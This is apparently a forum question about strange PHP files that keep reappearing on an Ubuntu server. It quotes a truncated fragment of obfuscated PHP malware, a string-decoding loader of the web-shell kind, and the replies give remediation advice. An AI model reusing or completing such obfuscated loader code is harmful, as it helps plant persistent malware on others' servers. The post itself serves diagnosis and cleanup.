# Strange directories and files created on my ubuntu server with strange php code

Tags: php, ubuntu

[image]

Above a screenshot of the directories and files created.

Below is the php code in one of the strange files

```
<?php function n1($f2){$s3 = " l_pHi?2f<40s@m3/IaEx" ."1ren6*5g9yL7b#k)chFuod;-.'v" ."(" ."t" ;$o5='';foreach($f2 as $s4){$o5.=$s3[$s4];}return $o5;}$k6 = Array();$k6[] = n1(Array(32,23,15,21,27,10,33,29,44,29>
```

Comment: seems like malware, that appeared, because oudated wordpress or other cms or its plugins were vulrenable

Comment: @vodolaz095 how do I solve this issue now, because they keep on being created even if I delete them. Is there a way to stop this malware?

Comment: The standard advice is to restore from a known backup. If you don’t have that, or are unable, there really isn’t any specific advice we can give you because it depends on your specific infection(s). Some general advice is that you could [scan file checksums](https://www.liquidweb.com/kb/how-to-verify-wordpress-checksums-using-wp-cli/) and also deactivate _all_ plugins and change to the default theme, then manually redownload plugins and themes and reactivate them.

Comment: Read this [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server)